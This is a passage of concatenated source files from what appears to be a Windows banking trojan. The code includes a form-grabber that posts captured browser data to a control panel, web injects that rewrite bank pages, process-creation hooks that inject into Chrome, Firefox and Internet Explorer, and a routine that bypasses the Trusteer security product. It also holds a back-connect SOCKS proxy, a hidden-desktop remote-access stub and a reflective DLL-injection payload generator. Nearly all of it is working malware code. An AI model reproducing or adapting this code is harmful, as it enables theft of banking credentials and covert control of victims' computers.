247 | static DWORD WINAPI UploadThread(LPVOID lpParam) 248 | { 249 | char *postData = (char *) lpParam; 250 | if(Funcs::pLstrlenA(postData) > 0) 251 | { 252 | char *r = PanelRequest(postData, NULL); 253 | Funcs::pFree(r); 254 | } 255 | Funcs::pFree(postData); 256 | return 0; 257 | } 258 | 259 | void UploadLog(char *software, char *url, char *data, BOOL inject) 260 | { 261 | if(UrlIsBlacklisted(url)) 262 | return; 263 | if(Funcs::pLstrlenA(data) == 0) 264 | return; 265 | char *postData = (char *) Alloc(Funcs::pLstrlenA(software) + Funcs::pLstrlenA(url) + Funcs::pLstrlenA(data) + 10); 266 | if(postData) 267 | { 268 | Funcs::pWsprintfA(postData, Strs::bu5, software, url, inject); 269 | Funcs::pLstrcatA(postData, data); 270 | Funcs::pCreateThread(NULL, 0, UploadThread, postData, 0, NULL); 271 | } 272 | } -------------------------------------------------------------------------------- /Bot/BrowserUtils.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "../Common.h" 3 | 4 | #define MAX_REQUESTS 256 5 | 6 | char *FindStrSandwich(char *buf, char *leftPart, char *rightPart); 7 | DWORD WildCardStrCmp(char *str, char *str2, BOOL ignoreCase, BOOL checkEnd); 8 | DWORD WildCardStrStr(char *str, char *subStr, char **start); 9 | BOOL ReplaceHeader(char **headers, char *name, char *value); 10 | BOOL ReplaceBeforeAfter(char **str2replace, char *strBeforeAfter, char *strReplaceBefore, char *strReplaceAfter); 11 | inline char *GetPath(char *headers); 12 | inline char *GetHost(char *headers); 13 | char *GetUrlHeaders(char *headers, BOOL *inject); 14 | char *GetUrlHostPath(char *host, char *path, BOOL *inject); 15 | void UploadLog(char *software, char *url, char *data, BOOL inject); -------------------------------------------------------------------------------- /Bot/Explorer.cpp: -------------------------------------------------------------------------------- 1 | #include "..\Common.h" 2 | #include "..\MinHook\include\MinHook.h" 3 | 4 | static DWORD (WINAPI *Real_CreateProcessInternal) 5 | ( 6 | DWORD unknown1, 7 | PWCHAR lpApplicationName, 8 | PWCHAR lpCommandLine, 9 | LPSECURITY_ATTRIBUTES lpProcessAttributes, 10 | LPSECURITY_ATTRIBUTES lpThreadAttributes, 11 | BOOL bInheritHandles, 12 | DWORD dwCreationFlags, 13 | LPVOID lpEnvironment, 14 | PWCHAR lpCurrentDirectory, 15 | LPSTARTUPINFO lpStartupInfo, 16 | LPPROCESS_INFORMATION lpProcessInformation, 17 | DWORD unknown2 18 | ); 19 | 20 | static DWORD WINAPI My_CreateProcessInternal( 21 | DWORD unknown1, 22 | PWCHAR lpApplicationName, 23 | PWCHAR lpCommandLine, 24 | LPSECURITY_ATTRIBUTES lpProcessAttributes, 25 | LPSECURITY_ATTRIBUTES lpThreadAttributes, 26 | BOOL bInheritHandles, 27 | DWORD dwCreationFlags, 28 | LPVOID lpEnvironment, 29 | PWCHAR lpCurrentDirectory, 30 | LPSTARTUPINFO lpStartupInfo, 31 | LPPROCESS_INFORMATION lpProcessInformation, 32 | DWORD unknown2) 33 | { 34 | char *lpCommandLineA = Utf16toUtf8(lpCommandLine); 35 | char *lpApplicationNameA = Utf16toUtf8(lpApplicationName); 36 | char *myCommandLine = (char *) Alloc(32768 + 1); 37 | char *exeName = Funcs::pPathFindFileNameA(lpApplicationNameA); 38 | 39 | if(lpCommandLineA) 40 | Funcs::pLstrcpyA(myCommandLine, lpCommandLineA); 41 | 42 | BOOL trusteer = FALSE; 43 | char programX86path[MAX_PATH] = { 0 }; 44 | Funcs::pSHGetFolderPathA(NULL, CSIDL_PROGRAM_FILESX86, NULL, 0, programX86path); 45 | Funcs::pLstrcatA(programX86path, Strs::fileDiv); 46 | Funcs::pLstrcatA(programX86path, Strs::trusteer); 47 | if(Funcs::pPathFileExistsA(programX86path)) 48 | trusteer = TRUE; 49 | 50 | BOOL inject = FALSE; 51 | BOOL vistaHack = FALSE; 52 | if(Funcs::pLstrcmpiA(exeName, Strs::chromeExe) == 0) 53 | { 54 | Funcs::pLstrcatA(myCommandLine, Strs::exp17); 55 | inject = TRUE; 56 | trusteer = FALSE; 57 | } 58 | else if(Funcs::pLstrcmpiA(exeName, Strs::firefoxExe) == 0) 59 | { 60 | SetFirefoxPrefs(); 61 | inject = TRUE; 62 | } 63 | else if(Funcs::pLstrcmpiA(exeName, Strs::iexploreExe) == 0) 64 | { 65 | DisableMultiProcessesAndProtectedModeIe(); 66 | inject = TRUE; 67 | } 68 | else if(Funcs::pLstrcmpiA(exeName, "") == 0 || 69 | Funcs::pLstrcmpiA(exeName, Strs::verclsidExe) == 0) 70 | { 71 | vistaHack = TRUE; //don't ask me why 72 | } 73 | 74 | if(trusteer) 75 | dwCreationFlags = dwCreationFlags | CREATE_SUSPENDED; 76 | 77 | wchar_t *myCommandLineW = Utf8toUtf16(myCommandLine); 78 | 79 | DWORD ret = 0; 80 | if(!vistaHack) 81 | { 82 | ret = Real_CreateProcessInternal(unknown1, 83 | lpApplicationName, 84 | myCommandLineW, 85 | lpProcessAttributes, 86 | lpThreadAttributes, 87 | bInheritHandles, 88 | dwCreationFlags, 89 | lpEnvironment, 90 | lpCurrentDirectory, 91 | lpStartupInfo, 92 | lpProcessInformation, 93 | unknown2); 94 | } 95 | 96 | if(!inject || !ret) 97 | goto exit; 98 | 99 | if(trusteer) 100 | { 101 | //if trusteer is x64 explorer will be too so we can inject directly 102 | BOOL x64 = IsProcessX64(lpProcessInformation->hProcess); 103 | if(x64) 104 | { 105 | lpProcessInformation->dwProcessId = BypassTrusteer(lpProcessInformation, lpApplicationNameA, lpCommandLineA); 106 | trusteer = FALSE; 107 | } 108 | else 109 | Funcs::pTerminateProcess(lpProcessInformation->hProcess, 0); 110 | } 111 | 112 | char pipeName[MAX_PATH] = { 0 }; 113 | char botId[BOT_ID_LEN] = { 0 }; 114 | GetBotId(botId); 115 | Funcs::pWsprintfA(pipeName, Strs::pipeName, botId); 116 | HANDLE hPipe = Funcs::pCreateFileA 117 | ( 118 | pipeName, 119 | GENERIC_WRITE | GENERIC_READ, 120 | FILE_SHARE_READ | FILE_SHARE_WRITE, 121 | NULL, 122 | OPEN_EXISTING, 123 | FILE_ATTRIBUTE_NORMAL, 124 | NULL 125 | ); 126 | DWORD writtenRead; 127 | 128 | Funcs::pWriteFile(hPipe, &lpProcessInformation->dwProcessId, sizeof(lpProcessInformation->dwProcessId), &writtenRead, NULL); 129 | Funcs::pWriteFile(hPipe, &trusteer, sizeof(trusteer), &writtenRead, NULL); 130 | if(trusteer) 131 | { 132 | int applicationNameLen = Funcs::pLstrlenA(lpApplicationNameA); 133 | Funcs::pWriteFile(hPipe, &applicationNameLen, sizeof(applicationNameLen), &writtenRead, NULL); 134 | Funcs::pWriteFile(hPipe, lpApplicationNameA, applicationNameLen, &writtenRead, NULL); 135 | 136 | int commandLineA = Funcs::pLstrlenA(lpCommandLineA); 137 | Funcs::pWriteFile(hPipe, &commandLineA, sizeof(commandLineA), &writtenRead, NULL); 138 | Funcs::pWriteFile(hPipe, lpCommandLineA, commandLineA, &writtenRead, NULL); 139 | } 140 | Funcs::pCloseHandle(hPipe); 141 | 142 | exit: 143 | Funcs::pFree(lpCommandLineA); 144 | Funcs::pFree(lpApplicationNameA); 145 | Funcs::pFree(myCommandLine); 146 | Funcs::pFree(myCommandLineW); 147 | return ret; 148 | } 149 | 150 | static char botId[BOT_ID_LEN] = { 0 }; 151 | 152 | static void Restart() 153 | { 154 | Funcs::pSleep(500); 155 | 156 | MH_DisableHook(MH_ALL_HOOKS); 157 | MH_Uninitialize(); 158 | 159 | char installPath[MAX_PATH] = { 0 }; 160 | GetInstallPath(installPath); 161 | 162 | STARTUPINFOA startupInfo = { 0 }; 163 | PROCESS_INFORMATION processInfo = { 0 }; 164 | startupInfo.cb = sizeof(startupInfo); 165 | Funcs::pCreateProcessA(installPath, NULL, NULL, NULL, FALSE, 0, NULL, NULL, &startupInfo, &processInfo); 166 | Funcs::pCloseHandle(processInfo.hProcess); 167 | Funcs::pCloseHandle(processInfo.hThread); 168 | } 169 | 170 | static DWORD WINAPI RestartThread(LPVOID lpParam) 171 | { 172 | for(;;) 173 | { 174 | HANDLE hMutex = OpenMutexA(SYNCHRONIZE, FALSE, botId); 175 | Funcs::pCloseHandle(hMutex); 176 | if(!hMutex) 177 | { 178 | Restart(); 179 | return 0; 180 | } 181 | Funcs::pSleep(10000); 182 | } 183 | return 0; 184 | } 185 | 186 | void HookExplorer() 187 | { 188 | MH_Initialize(); 189 | MH_CreateHookApi(Strs::wKernel32, Strs::exp18, My_CreateProcessInternal, (LPVOID *) &Real_CreateProcessInternal); 190 | MH_CreateHookApi(Strs::wKernelBase, Strs::exp18, My_CreateProcessInternal, (LPVOID *) &Real_CreateProcessInternal); 191 | MH_EnableHook(MH_ALL_HOOKS); 192 | 193 | GetBotId(botId); 194 | CreateThread(NULL, 0, RestartThread, NULL, 0, NULL); 195 | HANDLE hMutex = OpenMutexA(SYNCHRONIZE, FALSE, botId); 196 | Funcs::pWaitForSingleObject(hMutex, INFINITE); 197 | Funcs::pCloseHandle(hMutex); 198 | Restart(); 199 | } -------------------------------------------------------------------------------- /Bot/Explorer.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | void HookExplorer(); -------------------------------------------------------------------------------- /Bot/FirefoxChrome.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "..\Common.h" 3 | #include "WebInjects.h" 4 | #pragma once 5 | void HookFirefox(); 6 | void HookChrome(); 7 | 8 | -------------------------------------------------------------------------------- /Bot/HiddenDesktop.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "..\Common.h" 3 | 4 | void StartHiddenDesktop(char *host, int port); -------------------------------------------------------------------------------- /Bot/IE.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | void HookIe(); -------------------------------------------------------------------------------- /Bot/Main.cpp: -------------------------------------------------------------------------------- 1 | #pragma comment(linker, "/ENTRY:DllMain") 2 | 3 | extern "C" int _fltused = 0; 4 | 5 | #include "..\common.h" 6 | #include "..\wow64ext\wow64ext.h" 7 | #include "FirefoxChrome.h" 8 | #include "IE.h" 9 | #include "Explorer.h" 10 | #include "Bot.h" 11 | 12 | static BOOL CALLBACK EnumWindowsProc(HWND hwnd, LPARAM lParam) 13 | { 14 | DWORD pid; 15 | Funcs::pGetWindowThreadProcessId(hwnd, &pid); 16 | if(pid == Funcs::pGetCurrentProcessId()) 17 | return FALSE; 18 | return TRUE; 19 | } 20 | 21 | static void WaitForWindow() 22 | { 23 | for(;;) 24 | { 25 | if(!Funcs::pEnumWindows(EnumWindowsProc, NULL)) 26 | return; 27 | Sleep(100); 28 | } 29 | } 30 | 31 | static DWORD WINAPI EntryThread(LPVOID lpParam) 32 | { 33 | char exePath[MAX_PATH] = { 0 }; 34 | char *exeName; 35 | Funcs::pGetModuleFileNameA(NULL, exePath, MAX_PATH); 36 | exeName = Funcs::pPathFindFileNameA(exePath); 37 | 38 | char mutexName[MAX_PATH] = { 0 }; 39 | char botId[BOT_ID_LEN] = { 0 }; 40 | 41 | 42 | if(Funcs::pLstrcmpiA(exeName, Strs::dllhostExe) == 0) 43 | { 44 | #if !_WIN64 45 | InitPanelRequest(); 46 | InitWow64ext(); 47 | StartBot(); 48 | #endif 49 | } 50 | else if(Funcs::pLstrcmpiA(exeName, Strs::explorerExe) == 0) 51 | HookExplorer(); 52 | else if(Funcs::pLstrcmpiA(exeName, Strs::firefoxExe) == 0) 53 | { 54 | WaitForWindow(); 55 | InitPanelRequest(); 56 | HookFirefox(); 57 | } 58 | else if(Funcs::pLstrcmpiA(exeName, Strs::chromeExe) == 0) 59 | { 60 | WaitForWindow(); 61 | InitPanelRequest(); 62 | HookChrome(); 63 | } 64 | else if(Funcs::pLstrcmpiA(exeName, Strs::iexploreExe) == 0) 65 | { 66 | WaitForWindow(); 67 | InitPanelRequest(); 68 | HookIe(); 69 | } 70 | return 0; 71 | } 72 | 73 | BOOL WINAPI DllMain 74 | ( 75 | HINSTANCE hModule, 76 | DWORD dwReason, 77 | LPVOID lpArgs 78 | ) 79 | { 80 | switch(dwReason) 81 | { 82 | case DLL_PROCESS_ATTACH: 83 | { 84 | InitApi(); 85 | Funcs::pCreateThread(NULL, 0, EntryThread, NULL, 0, NULL); 86 | break; 87 | } 88 | } 89 | return TRUE; 90 | } -------------------------------------------------------------------------------- /Bot/Socks.cpp: -------------------------------------------------------------------------------- 1 | #include "Socks.h" 2 | 3 | #define TCP_STREAM_CON 0x01 4 | #define REQUEST_GRANTED 0x5A 5 | #define REQUEST_REJECTED 0x5B 6 | 7 | #define GetByteInt(i, n) (i >> (8 * n)) & 0xff 8 | 9 | static const BYTE gc_magik[] = { 'A', 'V', 'E', '_', 'M', 'A', 'R', 'I', 'A', 1 }; 10 | 11 | struct ClientThreadInfo 12 | { 13 | CHAR host[MAX_PATH]; 14 | INT port; 15 | }; 16 | 17 | static SOCKET ConnectServer(CHAR *host, USHORT port) 18 | { 19 | SOCKET s; 20 | WSADATA wsa; 21 | SOCKADDR_IN addr; 22 | if(!Funcs::pWSAStartup(MAKEWORD(2, 2), &wsa)) 23 | { 24 | if((s = Funcs::pSocket(AF_INET, SOCK_STREAM, 0)) != INVALID_SOCKET) 25 | { 26 | hostent *he = Funcs::pGethostbyname(host); 27 | Funcs::pMemcpy(&addr.sin_addr, he->h_addr_list[0], he->h_length); 28 | 29 | addr.sin_family = AF_INET; 30 | addr.sin_port = Funcs::pHtons(port); 31 | 32 | if(!Funcs::pConnect(s, (sockaddr *) &addr, sizeof(addr))) 33 | return s; 34 | } 35 | } 36 | return NULL; 37 | } 38 | 39 | static BOOL QueryProxy(SOCKET s_recv, SOCKET s_send) 40 | { 41 | UINT bytes = 0; 42 | if(Funcs::pIoctlsocket(s_recv, FIONREAD, (u_long *) &bytes) == SOCKET_ERROR) 43 | return FALSE; 44 | 45 | if(bytes) 46 | { 47 | char buffer[2048] = { 0 }; 48 | if((bytes = Funcs::pRecv(s_recv, buffer, sizeof(buffer), 0)) <= 0) 49 | return FALSE; 50 | if(Funcs::pSend(s_send, buffer, bytes, 0) <= 0) 51 | return FALSE; 52 | } 53 | else 54 | Funcs::pSleep(1); 55 | return TRUE; 56 | } 57 | 58 | static BOOL SendResponse(SOCKET s, BYTE status) 59 | { 60 | INT j; BYTE i = 0; 61 | 62 | if(Funcs::pSend(s, (PCHAR) &i, sizeof(i), 0) <= 0) 63 | return FALSE; 64 | 65 | i = status; 66 | if(Funcs::pSend(s, (PCHAR) &i, sizeof(i), 0) <= 0) 67 | return FALSE; 68 | 69 | i = 0; 70 | for (j = 0; j < 6; ++j) 71 | { 72 | if(Funcs::pSend(s, (PCHAR) &i, sizeof(i), 0) <= 0) 73 | return FALSE; 74 | } 75 | return TRUE; 76 | } 77 | 78 | static UINT WINAPI ClientConnectionThread(ClientThreadInfo *info) 79 | { 80 | DWORD ip, i; 81 | USHORT port; 82 | BYTE version = 0, commandType = 0; 83 | 84 | SOCKET socksSocket = ConnectServer(info->host, info->port); 85 | if(socksSocket == INVALID_SOCKET) 86 | goto exit; 87 | 88 | if(Funcs::pRecv(socksSocket, (CHAR *) &version, sizeof(version), 0) <= 0) 89 | goto exit; 90 | 91 | if(Funcs::pRecv(socksSocket, (CHAR *) &commandType, sizeof(commandType), 0) <= 0) 92 | goto exit; 93 | 94 | if(Funcs::pRecv(socksSocket, (CHAR *) &port, sizeof(port), 0) <= 0) 95 | goto exit; 96 | 97 | port = Funcs::pNtohs(port); 98 | if(Funcs::pRecv(socksSocket, (CHAR *) &ip, sizeof(ip), 0) <= 0) 99 | goto exit; 100 | 101 | CHAR ipStr[16] = { 0 }; 102 | CHAR userId[255] = { 0 }; 103 | Funcs::pWsprintfA(ipStr, "%u.%u.%u.%u", GetByteInt(ip, 0), GetByteInt(ip, 1), GetByteInt(ip, 2), GetByteInt(ip, 3)); 104 | 105 | for(i = 0; ; ++i) 106 | { 107 | if(sizeof(userId) <= i) 108 | goto exit; 109 | if(Funcs::pRecv(socksSocket, (CHAR *) &userId, sizeof(userId), 0) <= 0) 110 | goto exit; 111 | if (!userId[i]) break; 112 | } 113 | 114 | if(commandType != TCP_STREAM_CON) 115 | { 116 | SendResponse(socksSocket, REQUEST_REJECTED); 117 | goto exit; 118 | } 119 | 120 | SOCKET proxySocket = ConnectServer(ipStr, port); 121 | if(proxySocket == INVALID_SOCKET) 122 | goto exit; 123 | 124 | if(SendResponse(socksSocket, REQUEST_GRANTED) <= 0) 125 | goto exit; 126 | 127 | for(;;) 128 | { 129 | if(!QueryProxy(proxySocket, socksSocket)) 130 | goto exit; 131 | if(!QueryProxy(socksSocket, proxySocket)) 132 | goto exit; 133 | } 134 | 135 | exit: 136 | Funcs::pClosesocket(socksSocket); 137 | return 0; 138 | } 139 | 140 | static UINT WINAPI ClientThread(ClientThreadInfo *info) 141 | { 142 | SOCKET s = ConnectServer(info->host, info->port); 143 | if(s == INVALID_SOCKET) 144 | goto exit; 145 | 146 | if(Funcs::pSend(s, (CHAR *) gc_magik, sizeof(gc_magik), 0) <= 0) 147 | goto exit; 148 | 149 | for(;;) 150 | { 151 | INT port = 0; 152 | if(Funcs::pRecv(s, (CHAR *) &port, sizeof(port), 0) <= 0) 153 | goto exit; 154 | info->port = port; 155 | Funcs::pCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE) ClientConnectionThread, (VOID *) info, 0, 0); 156 | } 157 | exit: 158 | Funcs::pFree(info); 159 | return ERROR; 160 | } 161 | 162 | BOOL StartSocksClient(CHAR *host, INT port) 163 | { 164 | ClientThreadInfo *info = (ClientThreadInfo *) Alloc(sizeof(*info)); 165 | if(info) 166 | { 167 | if(host) 168 | { 169 | Funcs::pLstrcpyA(info->host, host); 170 | info->port = port; 171 | 172 | Funcs::pCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE) ClientThread, (VOID *) info, 0, 0); 173 | return TRUE; 174 | } 175 | } 176 | Funcs::pFree(info); 177 | return FALSE; 178 | } -------------------------------------------------------------------------------- /Bot/Socks.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "..\Common.h" 3 | 4 | BOOL StartSocksClient(CHAR *host, INT port); -------------------------------------------------------------------------------- /Bot/WebInjects.cpp: -------------------------------------------------------------------------------- 1 | #include "WebInjects.h" 2 | #include "BrowserUtils.h" 3 | 4 | static AiJson *json = NULL; 5 | static BOOL loaded = FALSE; 6 | 7 | //todo: obfuscate strings 8 | 9 | void LoadWebInjects() 10 | { 11 | if(loaded) 12 | return; 13 | char request[32] = { 0 }; 14 | Funcs::pLstrcpyA(request, Strs::injectsRequest); 15 | char *jsonStr = PanelRequest(request, NULL); 16 | if(!(json = AiJsonParse(jsonStr))) 17 | goto err; 18 | if(json->error != AI_JSON_E_OK) 19 | goto err; 20 | if(json->root.type != AI_JSON_OBJECT) 21 | goto err; 22 | loaded = TRUE; 23 | return; 24 | err: 25 | Funcs::pFree(jsonStr); 26 | AiJsonDestroy(json); 27 | Funcs::pSleep(POLL); 28 | LoadWebInjects(); 29 | } 30 | 31 | static AiListNode *GetFirstNode(char *name) 32 | { 33 | AiList *object = ((AiList *) json->root.data.object); 34 | AiJsonValue *currValue = AiJsonGetValueObject(object, name); 35 | if(!currValue) 36 | return NULL; 37 | 38 | if(currValue->type != AI_JSON_ARRAY) 39 | return NULL; 40 | 41 | return currValue->data.array->first; 42 | } 43 | 44 | BOOL UrlIsBlacklisted(char *url) 45 | { 46 | if(!loaded) 47 | return NULL; 48 | 49 | AiListNode *curr = GetFirstNode("fg_blacklist"); 50 | while(curr) 51 | { 52 | AiJsonValue *blacklistedUrlMask = (AiJsonValue *) curr->data; 53 | if(blacklistedUrlMask->type != AI_JSON_STRING) 54 | goto next; 55 | 56 | if(WildCardStrCmp(blacklistedUrlMask->data.string, url, TRUE, TRUE)) 57 | return TRUE; 58 | next: 59 | curr = curr->next; 60 | } 61 | return FALSE; 62 | } 63 | 64 | AiList *GetWebInject(char *host, char *path) 65 | { 66 | if(!loaded) 67 | return NULL; 68 | 69 | AiListNode *curr = GetFirstNode("injects"); 70 | 71 | while(curr) 72 | { 73 | AiJsonValue *object = (AiJsonValue *) curr->data; 74 | if(object->type != AI_JSON_OBJECT) 75 | goto next; 76 | 77 | AiJsonValue *url = AiJsonGetValueObject(object->data.object, "host"); 78 | if(!url || url->type != AI_JSON_STRING) 79 | goto next; 80 | 81 | AiJsonValue *uri = AiJsonGetValueObject(object->data.object, "path"); 82 | if(!uri || uri->type != AI_JSON_STRING) 83 | goto next; 84 | 85 | AiJsonValue *code = AiJsonGetValueObject(object->data.object, "content"); 86 | if(!code || code->type != AI_JSON_ARRAY || !code->data.array->len) 87 | goto next; 88 | 89 | if((!host || WildCardStrCmp(url->data.string, host, TRUE, TRUE)) && 90 | (!path || WildCardStrCmp(uri->data.string, path, TRUE, TRUE))) 91 | { 92 | return code->data.array; 93 | } 94 | next: 95 | curr = curr->next; 96 | } 97 | return NULL; 98 | } 99 | 100 | void ReplaceWebInjects(char **buffer, AiList *injects) 101 | { 102 | if(!injects || !buffer) 103 | return; 104 | AiListNode *curr = injects->first; 105 | while(curr) 106 | { 107 | AiJsonValue *object = (AiJsonValue *) curr->data; 108 | if(object->type != AI_JSON_OBJECT) 109 | goto next; 110 | 111 | AiJsonValue *replace = AiJsonGetValueObject(object->data.object, "code"); 112 | if(!replace || replace->type != AI_JSON_STRING) 113 | goto next; 114 | 115 | AiJsonValue *before = AiJsonGetValueObject(object->data.object, "before"); 116 | if(!before || before->type != AI_JSON_STRING) 117 | goto next; 118 | 119 | AiJsonValue *after = AiJsonGetValueObject(object->data.object, "after"); 120 | if(!after || after->type != AI_JSON_STRING) 121 | goto next; 122 | 123 | ReplaceBeforeAfter(buffer, replace->data.string, before->data.string, after->data.string); 124 | next: 125 | curr = curr->next; 126 | } 127 | } -------------------------------------------------------------------------------- /Bot/WebInjects.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "..\Common.h" 3 | #include "..\Panel.h" 4 | #include "..\AiJson\AiJson.h" 5 | 6 | void LoadWebInjects(); 7 | AiList *GetWebInject(char *host, char *path); 8 | void ReplaceWebInjects(char **buffer, AiList *injects); 9 | BOOL UrlIsBlacklisted(char *url); -------------------------------------------------------------------------------- /Common.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #define SECURITY_WIN32 3 | #pragma warning(disable: 4267) 4 | #pragma warning(disable: 4244) 5 | #pragma warning(disable: 4533) 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include "Api.h" 18 | #include "Utils.h" 19 | #include "Inject.h" 20 | #include "HTTP.h" 21 | #include "Panel.h" 22 | 23 | #define HOST Strs::host 24 | #define PATH Strs::path 25 | #define PORT 80 26 | #define POLL 60000 -------------------------------------------------------------------------------- /CreateDllInjectPayload/CreateDllInjectPayload.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | typedef struct _LSA_UNICODE_STRING 5 | { 6 | USHORT Length; 7 | USHORT MaximumLength; 8 | PWSTR Buffer; 9 | } LSA_UNICODE_STRING, *PLSA_UNICODE_STRING, UNICODE_STRING, *PUNICODE_STRING; 10 | 11 | typedef struct _STRING { 12 | USHORT Length; 13 | USHORT MaximumLength; 14 | PCHAR Buffer; 15 | } ANSI_STRING, *PANSI_STRING; 16 | 17 | typedef NTSTATUS (NTAPI *T_LdrLoadDll) (PWCHAR PathToFile, 18 | ULONG Flags, 19 | PUNICODE_STRING ModuleFileName, 20 | PHANDLE ModuleHandle); 21 | 22 | typedef NTSTATUS (NTAPI *T_LdrGetProcedureAddress) (HMODULE ModuleHandle, 23 | PANSI_STRING FunctionName, 24 | WORD Oridinal, 25 | PVOID *FunctionAddress); 26 | 27 | typedef VOID (NTAPI *T_RtlInitAnsiString) (PANSI_STRING DestinationString, PCHAR SourceString); 28 | 29 | typedef NTSTATUS (NTAPI *T_RtlAnsiStringToUnicodeString) (PUNICODE_STRING DestinationString, 30 | PANSI_STRING SourceString, 31 | BOOLEAN AllocateDestinationString); 32 | 33 | typedef VOID (NTAPI *T_RtlFreeUnicodeString) (PUNICODE_STRING UnicodeString); 34 | 35 | struct InjectData 36 | { 37 | BYTE *base; 38 | IMAGE_BASE_RELOCATION *baseRelocation; 39 | IMAGE_IMPORT_DESCRIPTOR *importDesc; 40 | T_RtlInitAnsiString pRtlInitAnsiString; 41 | T_RtlAnsiStringToUnicodeString pRtlAnsiStringToUnicodeString; 42 | T_LdrLoadDll pLdrLoadDll; 43 | T_LdrGetProcedureAddress pLdrGetProcedureAddress; 44 | T_RtlFreeUnicodeString pRtlFreeUnicodeString; 45 | }; 46 | 47 | typedef BOOL (WINAPI *T_DllMain) (HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved); 48 | 49 | DWORD WINAPI Payload(InjectData *injectData) 50 | { 51 | IMAGE_DOS_HEADER *dosHeader = (IMAGE_DOS_HEADER *) injectData->base; 52 | IMAGE_NT_HEADERS *ntHeaders = (IMAGE_NT_HEADERS *) (injectData->base + dosHeader->e_lfanew); 53 | IMAGE_BASE_RELOCATION *baseRelocation = (IMAGE_BASE_RELOCATION *) injectData->baseRelocation; 54 | 55 | size_t delta = (size_t) injectData->base - ntHeaders->OptionalHeader.ImageBase; 56 | 57 | while(baseRelocation->VirtualAddress) 58 | { 59 | if(baseRelocation->SizeOfBlock >= sizeof(IMAGE_BASE_RELOCATION)) 60 | { 61 | DWORD count = (baseRelocation->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(WORD); 62 | WORD *pWord = (WORD *) (baseRelocation + 1); 63 | 64 | for(DWORD i = 0; i < count; ++i) 65 | { 66 | DWORD type = pWord[i] >> 12; 67 | DWORD offset = pWord[i] & 0xfff; 68 | 69 | switch(type) 70 | { 71 | case IMAGE_REL_BASED_HIGHLOW: 72 | { 73 | DWORD *patchAddress; 74 | 75 | patchAddress = (DWORD *) (((DWORD) injectData->base) + baseRelocation->VirtualAddress + offset); 76 | *patchAddress += (DWORD) delta; 77 | break; 78 | } 79 | case IMAGE_REL_BASED_DIR64: 80 | { 81 | DWORD64 *patchAddress; 82 | 83 | patchAddress = (DWORD64 *) (((DWORD64) injectData->base) + baseRelocation->VirtualAddress + offset); 84 | *patchAddress += (DWORD64) delta; 85 | break; 86 | } 87 | } 88 | } 89 | } 90 | baseRelocation = (IMAGE_BASE_RELOCATION *) ((BYTE *) baseRelocation + baseRelocation->SizeOfBlock); 91 | } 92 | 93 | IMAGE_IMPORT_DESCRIPTOR *importDesc = (IMAGE_IMPORT_DESCRIPTOR *) injectData->importDesc; 94 | 95 | while(importDesc->Name) 96 | { 97 | ANSI_STRING aDllStr; 98 | injectData->pRtlInitAnsiString(&aDllStr, (char *) ((BYTE *) injectData->base + importDesc->Name)); 99 | 100 | UNICODE_STRING uDllStr; 101 | injectData->pRtlAnsiStringToUnicodeString(&uDllStr, &aDllStr, TRUE); 102 | 103 | HANDLE hModule; 104 | injectData->pLdrLoadDll(NULL, NULL, &uDllStr, &hModule); 105 | injectData->pRtlFreeUnicodeString(&uDllStr); 106 | 107 | IMAGE_THUNK_DATA *origThunkData = (IMAGE_THUNK_DATA *) ((BYTE *) injectData->base + importDesc->OriginalFirstThunk); 108 | IMAGE_THUNK_DATA *firstThunkData = (IMAGE_THUNK_DATA *) ((BYTE *) injectData->base + importDesc->FirstThunk); 109 | 110 | while(origThunkData->u1.AddressOfData) 111 | { 112 | ANSI_STRING aFuncStr; 113 | 114 | if(origThunkData->u1.Ordinal & IMAGE_ORDINAL_FLAG) 115 | injectData->pRtlInitAnsiString(&aFuncStr, (char *) (origThunkData->u1.Ordinal & 0xFFFF)); 116 | else 117 | { 118 | IMAGE_IMPORT_BY_NAME *importByName = (IMAGE_IMPORT_BY_NAME *) ((BYTE *) injectData->base + origThunkData->u1.AddressOfData); 119 | injectData->pRtlInitAnsiString(&aFuncStr, importByName->Name); 120 | } 121 | 122 | PVOID func; 123 | injectData->pLdrGetProcedureAddress((HMODULE) hModule, &aFuncStr, NULL, &func); 124 | firstThunkData->u1.Function = (size_t) func; 125 | 126 | ++origThunkData; 127 | ++firstThunkData; 128 | } 129 | ++importDesc; 130 | } 131 | 132 | T_DllMain pDllMain = (T_DllMain) ((BYTE *) injectData->base + ntHeaders->OptionalHeader.AddressOfEntryPoint); 133 | pDllMain((HMODULE) injectData->base, DLL_PROCESS_ATTACH, NULL); 134 | return 0; 135 | 136 | } 137 | 138 | void AfterPayload() { } 139 | 140 | int main(int argc, char **argv) 141 | { 142 | BYTE *func = (BYTE *) Payload; 143 | DWORD funcSize = (DWORD) AfterPayload - (DWORD) Payload; 144 | 145 | FILE *file = fopen("out.txt", "w"); 146 | fprintf(file, "DWORD payloadSize = %d;\n", funcSize); 147 | 148 | fputs("BYTE payload[] = { ", file); 149 | for(DWORD i = 0; i < funcSize; ++i) 150 | fprintf(file, "0x%02x, ", func[i]); 151 | fputs("};", file); 152 | } -------------------------------------------------------------------------------- /HTTP.cpp: -------------------------------------------------------------------------------- 1 | #include "HTTP.h" 2 | 3 | BOOL HttpSubmitRequest(HttpRequestData &httpRequestData) 4 | { 5 | BOOL ret = FALSE; 6 | WSADATA wsa; 7 | SOCKET s; 8 | 9 | char request[1024] = { 0 }; 10 | 11 | httpRequestData.outputBodySize = 0; 12 | Funcs::pLstrcpyA(request, (httpRequestData.post ? Strs::postSpace : Strs::getSpace)); 13 | Funcs::pLstrcatA(request, httpRequestData.path); 14 | Funcs::pLstrcatA(request, Strs::httpReq1); 15 | Funcs::pLstrcatA(request, Strs::httpReq2); 16 | Funcs::pLstrcatA(request, httpRequestData.host); 17 | 